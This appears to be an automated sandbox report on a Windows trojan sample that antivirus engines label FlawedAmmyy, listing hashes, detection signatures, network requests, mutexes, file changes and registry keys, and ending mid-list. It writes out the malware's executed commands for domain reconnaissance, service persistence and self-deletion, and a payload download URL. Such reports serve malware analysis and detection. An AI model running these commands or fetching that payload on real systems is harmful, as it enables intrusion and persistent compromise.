- [*] MalFamily: ""
- [*] MalScore: 10.0
- [*] File Name: "lt1"
- [*] File Size: 159488
- [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- [*] SHA256: "b07340bd812ac1d6bab85b1b49c4e935f100b17d59da632533c8ddd361529f10"
- [*] MD5: "2fcfddd92568af831a6f8febb817c900"
- [*] SHA1: "0e5f89ff146d7b1b6af5826a67fad93cdb3f7657"
- [*] SHA512: "4b11d0ff41ab6a58aad3de510fab8172521345372724047911355babd2bbfa32dc4fc2adff138de852de5fa3ca3ecbfafeff99d790eb6d000b8b397f3a312b9e"
- [*] CRC32: "853324A9"
- [*] SSDEEP: "3072:1k7WT8wAl28+h9VbjXKvKmeykXWlZrT8JUPQImMJ2szDHqldYPaShV1C8/Wn:1kHhl28+VbjXKvKmeykiZT8AQImz7YSB"
- [*] Process Execution: [
- "lt1.exe",
- "net.exe",
- "net1.exe",
- "net.exe",
- "net1.exe",
- "cmd.exe",
- "net.exe",
- "net1.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "net.exe",
- "net1.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "net.exe",
- "net1.exe",
- "cmd.exe",
- "services.exe",
- "wsus.exe",
- "wsus.exe",
- "svchost.exe",
- "svchost.exe",
- "msiexec.exe",
- "GoogleUpdate.exe",
- "svchost.exe",
- "taskhost.exe"
- ]
- [*] Signatures Detected: [
- {
- "Description": "Attempts to connect to a dead IP:Port (2 unique times)",
- "Details": [
- {
- "IP": "185.106.122.120:80"
- },
- {
- "IP": "172.217.11.163:443"
- }
- ]
- },
- {
- "Description": "Creates RWX memory",
- "Details": []
- },
- {
- "Description": "A process attempted to delay the analysis task.",
- "Details": [
- {
- "Process": "wsus.exe tried to sleep 599 seconds, actually delayed analysis time by 0 seconds"
- }
- ]
- },
- {
- "Description": "At least one IP Address, Domain, or File Name was found in a crypto call",
- "Details": [
- {
- "ioc": "http://crl.globalsign.net/root-r2.crl0"
- }
- ]
- },
- {
- "Description": "Reads data out of its own binary image",
- "Details": [
- {
- "self_read": "process: wsus.exe, pid: 1720, offset: 0x00000000, length: 0x00000400"
- }
- ]
- },
- {
- "Description": "A process created a hidden window",
- "Details": [
- {
- "Process": "lt1.exe -> cmd"
- },
- {
- "Process": "lt1.exe -> cmd"
- },
- {
- "Process": "lt1.exe -> cmd"
- },
- {
- "Process": "lt1.exe -> cmd"
- },
- {
- "Process": "lt1.exe -> cmd"
- },
- {
- "Process": "lt1.exe -> cmd"
- },
- {
- "Process": "lt1.exe -> C:\\Windows\\System32\\cmd.exe"
- }
- ]
- },
- {
- "Description": "Drops a binary and executes it",
- "Details": [
- {
- "binary": "C:\\ProgramData\\NuGets\\wsus.exe"
- }
- ]
- },
- {
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details": [
- {
- "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
- },
- {
- "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
- },
- {
- "suspicious_request": "http://185.140.248.17/01.dat"
- },
- {
- "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D"
- },
- {
- "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D"
- },
- {
- "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D"
- },
- {
- "suspicious_request": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEDoV9Mh%2FtNM5k9Pus79K5eQ%3D"
- },
- {
- "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D"
- },
- {
- "suspicious_request": "http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEDaCXn%2B1pIGTfvbRc2u5PKY%3D"
- },
- {
- "suspicious_request": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEEpXWRnDaZSEY67E8B6coDU%3D"
- },
- {
- "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAwVvkoVuwkDyQGx1sJlMC8%3D"
- },
- {
- "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D"
- },
- {
- "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D"
- },
- {
- "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAiIzVJfGSRETRSlgpHeuVI%3D"
- },
- {
- "suspicious_request": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEH4PjD8bD0NfJXpoX0ln6s4%3D"
- },
- {
- "suspicious_request": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHQnb7Tt0tUhlRVnnq4nPN8%3D"
- },
- {
- "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D"
- },
- {
- "suspicious_request": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHAHFVlJElKyLEMbtWWDIbo%3D"
- },
- {
- "suspicious_request": "http://ocsp.msocsp.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPC1vZt9qvn7bzY3Iidtbhla4mKQQUWIif1tycSCK3FD7%2FhIjo5oX%2F%2Bn0CE3sAAGyvV14%2FmEPDgh0AAAAAbK8%3D"
- },
- {
- "suspicious_request": "http://ocsp.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD%2Fyl6nWPkczAQUe1tFz6%2FOy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS%2BzcBkvzl4%3D"
- },
- {
- "suspicious_request": "http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D"
- },
- {
- "suspicious_request": "http://th.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9%2BWQCtWAQU1A1lP3q9NMb%2BR%2BdMDcC98t4Vq3ECEBT4%2FdFn%2BSQCsVcLXcSVyBU%3D"
- },
- {
- "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAH9o%2BtuynXIiEOLckvPvJE%3D"
- },
- {
- "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAVG%2Fhgj9%2BGUHaOfzhTEYXM%3D"
- },
- {
- "suspicious_request": "http://ocsp.pki.goog/gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjqTAc%2FHIGOD%2BaUx0%3D"
- },
- {
- "suspicious_request": "http://redirector.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe"
- }
- ]
- },
- {
- "Description": "Performs some HTTP requests",
- "Details": [
- {
- "url": "http://185.140.248.17/01.dat"
- },
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D"
- },
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D"
- },
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D"
- },
- {
- "url": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEDoV9Mh%2FtNM5k9Pus79K5eQ%3D"
- },
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D"
- },
- {
- "url": "http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEDaCXn%2B1pIGTfvbRc2u5PKY%3D"
- },
- {
- "url": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEEpXWRnDaZSEY67E8B6coDU%3D"
- },
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAwVvkoVuwkDyQGx1sJlMC8%3D"
- },
- {
- "url": "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab"
- },
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D"
- },
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D"
- },
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAiIzVJfGSRETRSlgpHeuVI%3D"
- },
- {
- "url": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEH4PjD8bD0NfJXpoX0ln6s4%3D"
- },
- {
- "url": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHQnb7Tt0tUhlRVnnq4nPN8%3D"
- },
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D"
- },
- {
- "url": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHAHFVlJElKyLEMbtWWDIbo%3D"
- },
- {
- "url": "http://ocsp.msocsp.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPC1vZt9qvn7bzY3Iidtbhla4mKQQUWIif1tycSCK3FD7%2FhIjo5oX%2F%2Bn0CE3sAAGyvV14%2FmEPDgh0AAAAAbK8%3D"
- },
- {
- "url": "http://ocsp.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD%2Fyl6nWPkczAQUe1tFz6%2FOy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS%2BzcBkvzl4%3D"
- },
- {
- "url": "http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D"
- },
- {
- "url": "http://th.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9%2BWQCtWAQU1A1lP3q9NMb%2BR%2BdMDcC98t4Vq3ECEBT4%2FdFn%2BSQCsVcLXcSVyBU%3D"
- },
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAH9o%2BtuynXIiEOLckvPvJE%3D"
- },
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAVG%2Fhgj9%2BGUHaOfzhTEYXM%3D"
- },
- {
- "url": "http://ocsp.pki.goog/gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjqTAc%2FHIGOD%2BaUx0%3D"
- },
- {
- "url": "http://redirector.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe"
- }
- ]
- },
- {
- "Description": "Deletes its original binary from disk",
- "Details": []
- },
- {
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details": [
- {
- "Spam": "services.exe (504) called API GetSystemTimeAsFileTime 11852309 times"
- }
- ]
- },
- {
- "Description": "Installs itself for autorun at Windows startup",
- "Details": [
- {
- "service name": "foundation"
- },
- {
- "service path": "C:\\ProgramData\\NuGets\\wsus.exe -service"
- }
- ]
- },
- {
- "Description": "File has been identified by 19 Antiviruses on VirusTotal as malicious",
- "Details": [
- {
- "FireEye": "Generic.mg.2fcfddd92568af83"
- },
- {
- "Alibaba": "Trojan:Win32/Kryptik.24c3281f"
- },
- {
- "Invincea": "heuristic"
- },
- {
- "Symantec": "Trojan.Flawedammyy"
- },
- {
- "Paloalto": "generic.ml"
- },
- {
- "Kaspersky": "HEUR:Trojan.Win32.Generic"
- },
- {
- "Rising": "Trojan.Kryptik!8.8 (CLOUD)"
- },
- {
- "McAfee-GW-Edition": "Artemis!Trojan"
- },
- {
- "SentinelOne": "DFI - Suspicious PE"
- },
- {
- "ESET-NOD32": "a variant of Win32/Kryptik.GTDL"
- },
- {
- "Endgame": "malicious (high confidence)"
- },
- {
- "ZoneAlarm": "HEUR:Trojan.Win32.Generic"
- },
- {
- "AhnLab-V3": "Downloader/Win32.FlawedAmmyy.C3289538"
- },
- {
- "McAfee": "Artemis!2FCFDDD92568"
- },
- {
- "VBA32": "BScope.Trojan.Zenpak"
- },
- {
- "Cylance": "Unsafe"
- },
- {
- "Ikarus": "Trojan.Win32.Crypt"
- },
- {
- "AVG": "FileRepMalware"
- },
- {
- "CrowdStrike": "win/malicious_confidence_90% (W)"
- }
- ]
- }
- ]
- [*] Started Service: [
- "foundation",
- "msiserver",
- "gupdate"
- ]
- [*] Executed Commands: [
- "net group /domain",
- "\"C:\\Windows\\System32\\cmd.exe\" /C net.exe stop foundation",
- "cmd /C net.exe stop foundation",
- "\"C:\\Windows\\System32\\cmd.exe\" /C sc delete foundation",
- "cmd /C sc delete foundation",
- "\"C:\\Windows\\System32\\cmd.exe\" /C sc create foundation binPath= \"C:\\ProgramData\\NuGets\\wsus.exe -service\" type= own start= auto error= ignore",
- "cmd /C sc create foundation binPath= \"C:\\ProgramData\\NuGets\\wsus.exe -service\" type= own start= auto error= ignore",
- "\"C:\\Windows\\System32\\cmd.exe\" /C net.exe start foundation y",
- "cmd /C net.exe start foundation y",
- "C:\\Windows\\System32\\cmd.exe /c del C:\\Users\\user\\AppData\\Local\\Temp\\lt1.exe >> NUL",
- "C:\\Windows\\system32\\net1 group /domain",
- "net.exe stop foundation",
- "sc delete foundation",
- "C:\\Windows\\system32\\net1 stop foundation",
- "sc create foundation binPath= \"C:\\ProgramData\\NuGets\\wsus.exe -service\" type= own start= auto error= ignore",
- "net.exe start foundation y",
- "C:\\Windows\\system32\\net1 start foundation y",
- "C:\\ProgramData\\NuGets\\wsus.exe -service",
- "C:\\Windows\\system32\\svchost.exe -k netsvcs",
- "C:\\Windows\\system32\\msiexec.exe /V",
- "\"C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe\" /svc",
- "C:\\Windows\\System32\\svchost.exe -k netsvcs",
- "\"C:\\ProgramData\\NuGets\\wsus.exe\" -nogui"
- ]
- [*] Mutexes: [
- "Local\\ZoneAttributeCacheCounterMutex",
- "Local\\ZonesCacheCounterMutex",
- "Local\\ZonesLockedCacheCounterMutex",
- "DBWinMutex",
- "Broiduti#3483488**#",
- "Global\\_MSIExecute",
- "Global\\G{D19BAF17-7C87-467E-8D63-6C4B1C836373}",
- "Global\\G{6885AE8E-C070-458d-9711-37B9BEAB65F6}",
- "Global\\G{66CC0160-ABB3-4066-AE47-1CA6AD5065C8}",
- "Global\\G{0A175FBE-AEEC-4fea-855A-2AA549A88846}"
- ]
- [*] Modified Files: [
- "\\Device\\NamedPipe",
- "C:\\ProgramData\\NuGets\\template_41c318.TMPTMPZIP7",
- "C:\\ProgramData\\NuGets\\wsus.exe",
- "\\??\\PIPE\\wkssvc",
- "\\??\\PIPE\\lsarpc",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8",
- "\\??\\WMIDataDevice",
- "\\??\\PIPE\\samr",
- "C:\\Windows\\sysnative\\wbem\\repository\\WRITABLE.TST",
- "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING1.MAP",
- "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING2.MAP",
- "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING3.MAP",
- "C:\\Windows\\sysnative\\wbem\\repository\\OBJECTS.DATA",
- "C:\\Windows\\sysnative\\wbem\\repository\\INDEX.BTR",
- "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
- "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER",
- "\\??\\NUL",
- "C:\\Windows\\Installer\\23b7c89.msi",
- "C:\\Windows\\Installer\\23b7c8a.msi",
- "\\??\\pipe\\GoogleCrashServices\\S-1-5-18",
- "C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat",
- "C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat"
- ]
- [*] Deleted Files: [
- "C:\\ProgramData\\Microsoft Help\\wsus.exe",
- "C:\\ProgramData\\NuGets\\wsus.exe",
- "C:\\ProgramData\\NuGets\\template_41c318.TMPTMPZIP7",
- "C:\\Users\\user\\AppData\\Local\\Temp\\lt1.exe",
- "C:\\Windows\\Installer\\23b7c89.msi",
- "C:\\Program Files (x86)\\Google\\Update\\Install\\{0E51DEF1-ED79-4FDA-92A7-D7F8B9999365}\\GoogleUpdateSetup.exe",
- "C:\\Program Files (x86)\\Google\\Update\\Install\\{0E51DEF1-ED79-4FDA-92A7-D7F8B9999365}"
- ]
- [*] Modified Registry Keys: [
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\msiserver\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\gupdate\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\BITS\\Start",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\BITS\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\netsxuid",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ProcessID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ThrottleDrege",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Parameters\\ServiceDllUnloadOnStop",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart",
- "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Wbem\\Transports\\Decoupled\\Server",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\CreationTime",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\MarshaledProxy",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\ProcessIdentifier",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ConfigValueEssNeedsLoading",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\List of event-active namespaces",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\ESS\\//./root/CIMV2\\SCM Event Provider",
- "HKEY_LOCAL_MACHINE\\Software\\Google\\Update\\PersistedPings\\{8789A270-6461-4B27-AA47-830514BDA0FF}",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\PersistedPings\\{8789A270-6461-4B27-AA47-830514BDA0FF}\\PersistedPingString",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\PersistedPings\\{8789A270-6461-4B27-AA47-830514BDA0FF}\\PersistedPingTime",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\pv",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\pv",
- "HKEY_LOCAL_MACHINE\\Software\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\CurrentState",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\CurrentState\\StateValue",
- "HKEY_USERS\\S-1-5-21-0000000000-0000000000-0000000000-1000_CLASSES\\Local Settings\\MuiCache\\2E\\52C64B7E\\LanguageList",
- "HKEY_USERS\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Software\\Google\\Update\\proxy\\source",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\RollCallDayStartSec",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\DayOfLastRollCall",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\ping_freshness",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\cohort\\(Default)",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\cohort\\hint",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\cohort\\name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\LastCheckSuccess",
- "HKEY_USERS\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Software\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\dr",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\ActivePingDayStartSec",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\RollCallDayStartSec",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\DayOfLastActivity",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\DayOfLastRollCall",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\ping_freshness",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\cohort\\(Default)",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\cohort\\hint",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\cohort\\name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\UpdateAvailableCount",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\UpdateAvailableSince",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\LastChecked",
- "HKEY_LOCAL_MACHINE\\Software\\Google\\Update\\PersistedPings\\{A4C39F19-AC6A-4AF4-9EF9-212DF42F10D1}",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\PersistedPings\\{A4C39F19-AC6A-4AF4-9EF9-212DF42F10D1}\\PersistedPingString",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\PersistedPings\\{A4C39F19-AC6A-4AF4-9EF9-212DF42F10D1}\\PersistedPingTime",
